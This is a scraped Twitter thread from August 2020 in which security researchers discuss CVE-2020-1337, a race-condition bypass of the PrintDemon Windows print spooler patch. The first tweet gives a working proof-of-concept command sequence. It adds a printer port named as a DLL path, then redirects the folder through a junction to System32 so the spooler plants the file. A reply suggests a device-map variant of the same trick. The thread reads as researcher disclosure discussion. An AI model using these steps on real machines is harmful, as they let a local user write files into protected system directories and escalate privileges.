CVE-2020-1337 is CVE-2020-1048 (aka PrintDemon) with a TOCTOU. PoC: mkdir C:\test Add-PrinterPort -Name c:\test\ualapi.dll New-Item -Type Junction -Path C:\test -Value C:\Windows\System32
-
Show this thread
Replying to @clavoillotte
or just use a per profile device map while creating the port- redirecting the path it checks if it can write to while impersonating you. But you are 100% correct the root problem here is TOCTOU
11:10 AM - 11 Aug 2020
0 replies
0 retweets
5 likes
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.